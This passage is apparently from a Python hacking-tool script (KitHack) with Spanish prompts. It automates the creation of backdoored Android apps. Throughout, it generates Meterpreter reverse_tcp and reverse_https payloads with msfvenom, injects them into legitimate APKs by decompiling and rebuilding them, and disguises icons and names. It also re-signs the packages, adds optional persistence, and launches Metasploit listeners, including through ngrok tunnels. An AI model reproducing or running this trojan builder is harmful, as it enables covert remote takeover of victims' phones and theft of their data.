LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/payload -o output/kithack.apk') - location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - # Salida de bucle - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif a == '02': - print ('{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} Use the old Metasploit method'.format(WHITE, YELLOW)) - print ('{0}[02]{1} Use the new KitHack method'.format(WHITE, YELLOW)) - - m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - m = m.zfill(2) - - if m == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_https LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif m == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) - location = os.getcwd() - print("{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) - print("\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("{}\n[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - elif pay == '03': - print ('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print ('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) - - a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - a = a.zfill(2) - - if a == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - break - else: - Tk().withdraw() - icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) - print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - file = open("/tmp/data.txt", "w") - file.write(icon + '\n') - file.write(mainout) - file.close() - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/payload -o output/kithack.apk') - location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - # Salida de bucle - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif a == '02': - print ('{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} Use the old Metasploit method'.format(WHITE, YELLOW)) - print ('{0}[02]{1} Use the new KitHack method'.format(WHITE, YELLOW)) - - m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - m = m.zfill(2) - - if m == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif m == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) - location = os.getcwd() - print("{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) - print("\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("{}\n[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - elif pay == '04': - print ('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print ('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) - - a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - a = a.zfill(2) - - if a == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - break - else: - Tk().withdraw() - icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) - print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - file = open("/tmp/data.txt", "w") - file.write(icon + '\n') - file.write(mainout) - file.close() - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/payload -o output/kithack.apk') - location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - # Salida de bucle - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) - location = 